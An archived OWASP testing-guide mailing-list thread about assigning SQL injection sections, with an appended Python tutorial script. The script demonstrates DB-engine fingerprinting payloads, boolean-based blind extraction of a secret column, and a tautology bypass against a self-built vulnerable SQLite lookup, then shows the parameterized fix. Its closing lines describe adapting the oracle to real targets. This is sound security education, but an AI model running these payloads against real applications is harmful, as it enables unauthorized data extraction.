[OWASP-TESTING] Next stage

Meghna Nadkarni meghnan at mahindrabt.com
Thu Jun 23 00:52:17 EDT 2005


Hi Daniel,

I would like to take up the section on Web Services Security.

Cheers,
Meghna

-----Original Message-----
From: owasp-testing-admin at lists.sourceforge.net
[mailto:owasp-testing-admin at lists.sourceforge.net] On Behalf Of Victor
Chapela
Sent: Wednesday, June 22, 2005 9:53 PM
To: 'Daniel Cuthbert'
Cc: owasp-testing at lists.sourceforge.net
Subject: RE: [OWASP-TESTING] Next stage

Hi Dan,

No problem covering the points you mention. In fact, as you say, this may
turn out to be a very large section if I include all that I have on SQL
Injection. I would nevertheless add to what you suggest:
- Ways to determine DB engine type
- Oracle and DB2 injection
- IDS evasion
- Some checklist to determine injection type and risk level

What do you think I should NOT include?
- For example: I think it should NOT be a SQL injection course for
beginners, but more of a specific, incremental and step-by-step methodology
to get to understand the query, privileges and capabilities to assess the
potential risk. I think it should assume SQL and database-specific working
knowledge.

There is also some overlap with fuzzing, code review (for the whitebox
part) and encryption. How will we coordinate our efforts so that we don't
end up writing similar things several times?

-Victor

> -----Original Message-----
> From: Daniel Cuthbert [mailto:daniel.cuthbert at owasp.org]
> Sent: Tuesday, June 21, 2005 8:45 AM
> To: Victor Chapela
> Cc: owasp-testing at lists.sourceforge.net
> Subject: Re: [OWASP-TESTING] Next stage
>
> Thanks Victor
>
> SQL injection is an interesting one, as the section is
> potentially huge. Would you mind making sure that the
> following are covered, if possible:
>
> - standard sql injection
> - stored procedure injection with sql 2000
> - blind sql injection
> - mysql/postgres injection
> - mitigating circumstances
>
>
> On 21 Jun 2005, at 12:50, Victor Chapela wrote:
>
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > Hi Dan,
> >
> > I have attached my name to all the SQL Injection related sections. I
> > can add the most value in these sections given my personal research.
> > I could help with other parts if needed (like other kinds of
> > injection), let me know.
> >
> > Best regards,
> > Victor
> >
> >
> >> -----Original Message-----
> >> From: owasp-testing-admin at lists.sourceforge.net
> >> [mailto:owasp-testing-admin at lists.sourceforge.net] On Behalf Of
> >> Daniel Cuthbert
> >> Sent: Tuesday, June 21, 2005 4:05 AM
> >> To: owasp-testing at lists.sourceforge.net
> >> Subject: [OWASP-TESTING] Next stage
> >>
> >> Morning all,
> >>
> >> Sorry for the short break in the testing guide progress, the real
> >> world caught up with me.
> >> Attached are the documents needed for the next part of the guide, and
> >> they are:
> >>
> >> Testing Guide II Structure.doc
> >>
> >> This is the final TOC as we agreed and next to each section, there is
> >> the option to add your name and your e-mail address (i.e. you will be
> >> writing this section).
> >>
> >> template1.htm
> >>
> >> If you could structure all your submissions using this template (you
> >> can use any format you like, word/text/xml, as long as I can read it
> >> on a Mac!).
> >>
> >> Guidelines for creating sections:
> >>
> >> - DO NOT DO A STRAIGHT COPY FROM ANY OTHER SOURCES ON THE WEB!
> >> Plagiarism won't be accepted.
> >> This testing guide should reflect the experience you all have in
> >> application testing. One of the benefits of OWASP is that the wealth
> >> of experience from the contributors enables the reader to understand
> >> the section they are reading, as it is presented in a well-structured
> >> format, which, unlike a large number of research papers on the web
> >> today, isn't normally the case.
> >>
> >> - Try and use examples where possible and also let other
> >> "non-security" individuals read what you have written. This ensures
> >> that it makes sense to everyone and not just the hardcore penetration
> >> testers out there.
> >>
> >> - I understand everyone has a life and work commitments, so please
> >> don't select loads of sections if you know you may not be able to
> >> commit to them in the end run.
> >>
> >> - Contact me if you have any issues during this next phase
> >>
> >>
> >> I think we should aim to have all the sections written by mid-August.
> >> How does this sound to everyone?
> >>
> >> Obviously if you feel there is a section missing from the TOC, by all
> >> means contact me.
> >>
> >> Look forward to seeing the work coming in
> >>
> >> Daniel Cuthbert
> >>
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGP 8.1
> >
> > iQA/AwUBQrf/IL6TmquzxiX9EQIwGgCff2FwSkMwAHtkVa9FE3nIBvwAHz0AoPvf
> > i69Wf8656wb/YhxRCf9VExJd
> > =OKq+
> > -----END PGP SIGNATURE-----
> >
> >
> > <Testing_Guide_II_structure.doc>
> >
>
>



_______________________________________________
owasp-testing mailing list
owasp-testing at lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/owasp-testing

**************************************************
Disclaimer:

The contents of this E-mail (including the contents of the enclosure(s) or attachment(s) if any) are privileged and confidential material of MBT and should not be disclosed to, used by or copied in any manner by anyone other than the intended addressee(s). In case you are not the desired addressee, you should delete this message and/or re-direct it to the sender. The views expressed in this E-mail message (including the enclosure(s) or attachment(s) if any) are those of the individual sender, except where the sender expressly, and with authority, states them to be the views of MBT.

This e-mail message including attachment/(s), if any, is believed to be free of any virus. However, it is the responsibility of the recipient to ensure that it is virus free and MBT is not responsible for any loss or damage arising in any way from its use
**************************************************
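Added example (written for this page; it is not code from the thread, from any of its authors, or from the OWASP Testing Guide): a runnable Python sketch of several items on the SQL injection list discussed above. It shows a deliberately vulnerable lookup built by string concatenation, a probe-based way to determine the DB engine type, a boolean-based blind extraction against the same lookup, and the parameterized fix as the mitigating circumstance. Everything in it is a constructed assumption for the demo: the users table and its two rows, the known-good value 'alice' used as the true base of every payload, and the small engine probe set. The backend is an in-memory SQLite database, so only the SQLite probe succeeds here.

```python
import sqlite3

# Constructed sample database (assumption for this demo): one users table
# with two rows, enough to attack a lookup on the `name` column.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users (name, secret) VALUES (?, ?)",
                     [("alice", "s3cr3t"), ("bob", "hunter2")])
    return conn

def user_exists_vulnerable(conn, name):
    """Deliberately vulnerable: concatenation lets the caller rewrite the
    query. Database errors are swallowed and reported as 'no such user',
    which is exactly the yes/no oracle a blind injection needs."""
    sql = "SELECT COUNT(*) FROM users WHERE name = '" + name + "'"
    try:
        return conn.execute(sql).fetchone()[0] > 0
    except sqlite3.Error:
        return False

def user_exists_fixed(conn, name):
    """Mitigation: a bound parameter is data, never SQL syntax."""
    sql = "SELECT COUNT(*) FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchone()[0] > 0

# Engine-specific expressions (illustrative subset, an assumption of this
# demo): only the engine that understands one of them evaluates it without
# error, so the oracle answers 'true' for exactly one of them.
ENGINE_PROBES = {
    "sqlite": "sqlite_version()",
    "mysql": "connection_id()",
    "postgresql": "current_setting('server_version')",
    "mssql": "@@servername",
    "oracle": "(SELECT banner FROM v$version WHERE ROWNUM = 1)",
}

def fingerprint(oracle):
    """Determine the DB engine type: the first probe that evaluates wins.
    'alice' is assumed to be a value known to exist, so the injected AND
    condition is the only thing that decides the answer."""
    for engine, expr in ENGINE_PROBES.items():
        if oracle(f"alice' AND ({expr}) IS NOT NULL -- "):
            return engine
    return "unknown"

def blind_extract(oracle, expr, max_len=64):
    """Boolean-based blind extraction of the string `expr` evaluates to,
    binary-searching each character's code point (0..127) via the oracle.
    unicode() and substr() are SQLite's; other engines need their own
    equivalents (e.g. ascii()/ord()), which is why engine type comes first."""
    out = ""
    for pos in range(1, max_len + 1):
        # Stop once the string has no character at this position.
        if not oracle(f"alice' AND length({expr}) >= {pos} -- "):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"alice' AND unicode(substr({expr}, {pos}, 1)) > {mid} -- "):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out

if __name__ == "__main__":
    db = make_db()
    ask = lambda payload: user_exists_vulnerable(db, payload)
    print("engine:", fingerprint(ask))
    print("alice's secret:", blind_extract(ask, "(SELECT secret FROM users WHERE id = 1)"))
    print("vulnerable bypass:", user_exists_vulnerable(db, "nobody' OR '1'='1"))
    print("fixed bypass:", user_exists_fixed(db, "nobody' OR '1'='1"))
```

Run as-is and the oracle identifies SQLite, pulls alice's secret one character at a time, and the classic `' OR '1'='1` tautology passes the vulnerable lookup but not the parameterized one. Against a real target the oracle is whatever the application leaks (a different page, status code or response time), and the trailing `-- ` comment and `unicode()` call are among the first things to swap when the fingerprint says the engine is not SQLite.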



